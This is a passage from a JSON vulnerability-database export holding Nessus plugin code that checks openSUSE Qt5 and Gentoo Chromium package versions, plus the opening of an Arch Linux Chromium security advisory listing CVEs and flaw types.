rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Bluetooth5-32bit-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Bluetooth5-debuginfo-32bit-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Bootstrap-devel-static-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5CLucene5-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5CLucene5-debuginfo-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Compositor5-32bit-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Compositor5-debuginfo-32bit-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Concurrent-devel-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Concurrent5-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Concurrent5-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Core-devel-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Core5-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Core5-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5DBus-devel-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5DBus-devel-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5DBus5-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5DBus5-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Declarative5-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Declarative5-debuginfo-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Designer5-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Designer5-debuginfo-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5DesignerComponents5-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5DesignerComponents5-debuginfo-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Gui-devel-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Gui5-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Gui5-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Help5-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Help5-debuginfo-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Location5-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Location5-debuginfo-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Multimedia5-32bit-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Multimedia5-debuginfo-32bit-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Network-devel-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Network5-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Network5-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Nfc5-32bit-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Nfc5-debuginfo-32bit-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5OpenGL-devel-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5OpenGL5-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5OpenGL5-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5OpenGLExtensions-devel-static-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5PlatformSupport-devel-static-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Positioning5-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Positioning5-debuginfo-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5PrintSupport-devel-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5PrintSupport5-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5PrintSupport5-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Script5-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Script5-debuginfo-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Sensors5-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Sensors5-debuginfo-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5SerialPort5-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5SerialPort5-debuginfo-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Sql-devel-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Sql5-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Sql5-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Sql5-mysql-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Sql5-mysql-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Sql5-postgresql-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Sql5-postgresql-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Sql5-sqlite-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Sql5-sqlite-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Sql5-unixODBC-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Sql5-unixODBC-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Svg5-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Svg5-debuginfo-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Test-devel-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Test5-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Test5-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5WaylandClient5-32bit-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5WaylandClient5-debuginfo-32bit-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5WebChannel5-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5WebChannel5-debuginfo-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5WebKit5-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5WebKit5-debuginfo-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5WebKit5-devel-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5WebKitWidgets-devel-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5WebKitWidgets5-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5WebKitWidgets5-debuginfo-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5WebSockets5-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5WebSockets5-debuginfo-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Widgets-devel-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Widgets5-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Widgets5-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5X11Extras5-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5X11Extras5-debuginfo-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Xml-devel-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Xml5-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5Xml5-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5XmlPatterns5-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt5XmlPatterns5-debuginfo-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQtQuick5-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQtQuick5-debuginfo-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtbase-examples-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtbase-examples-debuginfo-32bit-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtconnectivity-devel-32bit-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtdeclarative-devel-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtdeclarative-devel-debuginfo-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtimageformats-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtimageformats-debuginfo-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtlocation-devel-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtmultimedia-devel-32bit-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtquick1-devel-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtquick1-devel-debuginfo-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtscript-devel-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtsensors-devel-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtserialport-devel-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtsvg-devel-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qttools-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qttools-debuginfo-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qttools-devel-32bit-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtwayland-32bit-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtwayland-debuginfo-32bit-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtwayland-devel-32bit-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtwebchannel-devel-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtwebengine-32bit-5.5.1-4.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtwebengine-debuginfo-32bit-5.5.1-4.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtwebengine-devel-32bit-5.5.1-4.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtwebsockets-devel-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtx11extras-devel-32bit-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libqt5-qtxmlpatterns-devel-32bit-5.5.1-3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"calibre / calibre-debuginfo / calibre-debugsource / fcitx-qt5 / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:04:58", "description": "The remote host is affected by the vulnerability described in GLSA-201603-09\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the Chromium web\n browser. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-03-14T00:00:00", "title": "GLSA-201603-09 : Chromium: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-6776", "CVE-2016-1628", "CVE-2016-1634", "CVE-2015-6775", "CVE-2016-1638", "CVE-2015-6789", "CVE-2015-6766", "CVE-2015-6762", "CVE-2015-8126", "CVE-2015-1288", "CVE-2015-1281", "CVE-2015-6764", "CVE-2016-1612", "CVE-2015-6770", "CVE-2015-6760", "CVE-2015-6781", "CVE-2015-1291", "CVE-2016-1615", "CVE-2015-1275", "CVE-2016-1626", "CVE-2016-1618", "CVE-2015-1297", "CVE-2015-1286", "CVE-2016-1613", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-6771", "CVE-2015-1289", "CVE-2015-1296", "CVE-2015-1270", "CVE-2015-6784", "CVE-2015-1272", "CVE-2015-1283", "CVE-2015-1279", "CVE-2015-1274", "CVE-2015-1300", "CVE-2015-1287", "CVE-2016-1621", "CVE-2016-1631", "CVE-2015-6774", "CVE-2015-6778", "CVE-2016-1640", "CVE-2016-1632", "CVE-2015-1282", "CVE-2016-1622", "CVE-2015-6772", "CVE-2015-1285", "CVE-2016-1639", "CVE-2016-1616", "CVE-2015-1302", "CVE-2015-1293", "CVE-2015-6758", "CVE-2015-1303", "CVE-2015-1294", "CVE-2016-1635", "CVE-2015-1276", "CVE-2015-1278", "CVE-2016-1620", "CVE-2015-6767", "CVE-2015-6783", "CVE-2016-1636", "CVE-2015-6787", "CVE-2015-6792", "CVE-2015-1277", "CVE-2016-1627", "CVE-2015-6786", "CVE-2016-1641", "CVE-2016-1633", "CVE-2016-1624", "CVE-2016-1617", "CVE-2015-6791", "CVE-2016-1629", "CVE-2015-6780", "CVE-2015-6785", "CVE-2015-6790", "CVE-2016-1619", "CVE-2015-1271", "CVE-2015-1292", "CVE-2015-6779", "CVE-2015-6788", "CVE-2015-6759", "CVE-2015-1273", "CVE-2015-6756", "CVE-2015-6768", "CVE-2015-6763", "CVE-2016-1630", "CVE-2016-1637", "CVE-2015-6765", "CVE-2015-6755", "CVE-2015-6769", "CVE-2015-6773", "CVE-2015-1304", "CVE-2015-6777", "CVE-2015-1280", "CVE-2015-1299", "CVE-2015-6757", "CVE-2016-1623", "CVE-2015-6782", "CVE-2016-1625", "CVE-2015-1284", "CVE-2016-1614", "CVE-2015-6761"], "modified": "2016-03-14T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:chromium"], "id": "GENTOO_GLSA-201603-09.NASL", "href": "https://www.tenable.com/plugins/nessus/89902", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201603-09.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89902);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1270\", \"CVE-2015-1271\", \"CVE-2015-1272\", \"CVE-2015-1273\", \"CVE-2015-1274\", \"CVE-2015-1275\", \"CVE-2015-1276\", \"CVE-2015-1277\", \"CVE-2015-1278\", \"CVE-2015-1279\", \"CVE-2015-1280\", \"CVE-2015-1281\", \"CVE-2015-1282\", \"CVE-2015-1283\", \"CVE-2015-1284\", \"CVE-2015-1285\", \"CVE-2015-1286\", \"CVE-2015-1287\", \"CVE-2015-1288\", \"CVE-2015-1289\", \"CVE-2015-1291\", \"CVE-2015-1292\", \"CVE-2015-1293\", \"CVE-2015-1294\", \"CVE-2015-1295\", \"CVE-2015-1296\", \"CVE-2015-1297\", \"CVE-2015-1298\", \"CVE-2015-1299\", \"CVE-2015-1300\", \"CVE-2015-1302\", \"CVE-2015-1303\", \"CVE-2015-1304\", \"CVE-2015-6755\", \"CVE-2015-6756\", \"CVE-2015-6757\", \"CVE-2015-6758\", \"CVE-2015-6759\", \"CVE-2015-6760\", \"CVE-2015-6761\", \"CVE-2015-6762\", \"CVE-2015-6763\", \"CVE-2015-6764\", \"CVE-2015-6765\", \"CVE-2015-6766\", \"CVE-2015-6767\", \"CVE-2015-6768\", \"CVE-2015-6769\", \"CVE-2015-6770\", \"CVE-2015-6771\", \"CVE-2015-6772\", \"CVE-2015-6773\", \"CVE-2015-6774\", \"CVE-2015-6775\", \"CVE-2015-6776\", \"CVE-2015-6777\", \"CVE-2015-6778\", \"CVE-2015-6779\", \"CVE-2015-6780\", \"CVE-2015-6781\", \"CVE-2015-6782\", \"CVE-2015-6783\", \"CVE-2015-6784\", \"CVE-2015-6785\", \"CVE-2015-6786\", \"CVE-2015-6787\", \"CVE-2015-6788\", \"CVE-2015-6789\", \"CVE-2015-6790\", \"CVE-2015-6791\", \"CVE-2015-6792\", \"CVE-2015-8126\", \"CVE-2016-1612\", \"CVE-2016-1613\", \"CVE-2016-1614\", \"CVE-2016-1615\", \"CVE-2016-1616\", \"CVE-2016-1617\", \"CVE-2016-1618\", \"CVE-2016-1619\", \"CVE-2016-1620\", \"CVE-2016-1621\", \"CVE-2016-1622\", \"CVE-2016-1623\", \"CVE-2016-1624\", \"CVE-2016-1625\", \"CVE-2016-1626\", \"CVE-2016-1627\", \"CVE-2016-1628\", \"CVE-2016-1629\", \"CVE-2016-1630\", \"CVE-2016-1631\", \"CVE-2016-1632\", \"CVE-2016-1633\", \"CVE-2016-1634\", \"CVE-2016-1635\", \"CVE-2016-1636\", \"CVE-2016-1637\", \"CVE-2016-1638\", \"CVE-2016-1639\", \"CVE-2016-1640\", \"CVE-2016-1641\");\n script_xref(name:\"GLSA\", value:\"201603-09\");\n\n script_name(english:\"GLSA-201603-09 : Chromium: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201603-09\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the Chromium web\n browser. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201603-09\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-49.0.2623.87'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 49.0.2623.87\"), vulnerable:make_list(\"lt 49.0.2623.87\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:42", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1297", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "description": "- CVE-2015-1291, CVE-2015-1293:\n\nCross-origin bypass in DOM.\n\n- CVE-2015-1292:\n\nCross-origin bypass in ServiceWorker.\n\n- CVE-2015-1294:\n\nUse-after-free in Skia.\n\n- CVE-2015-1295:\n\nUse-after-free in Printing.\n\n- CVE-2015-1296:\n\nCharacter spoofing in omnibox.\n\n- CVE-2015-1297:\n\nPermission scoping error in WebRequest.\n\n- CVE-2015-1298:\n\nURL validation error in extensions.\n\n- CVE-2015-1299:\n\nUse-after-free in Blink.\n\n- CVE-2015-1300:\n\nInformation leak in Blink.\n\n- CVE-2015-1301:\n\nVarious fixes from internal audits, fuzzing and other initiatives.", "modified": "2015-09-02T00:00:00", "published": "2015-09-02T00:00:00", "id": "ASA-201509-1", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-September/000390.html", 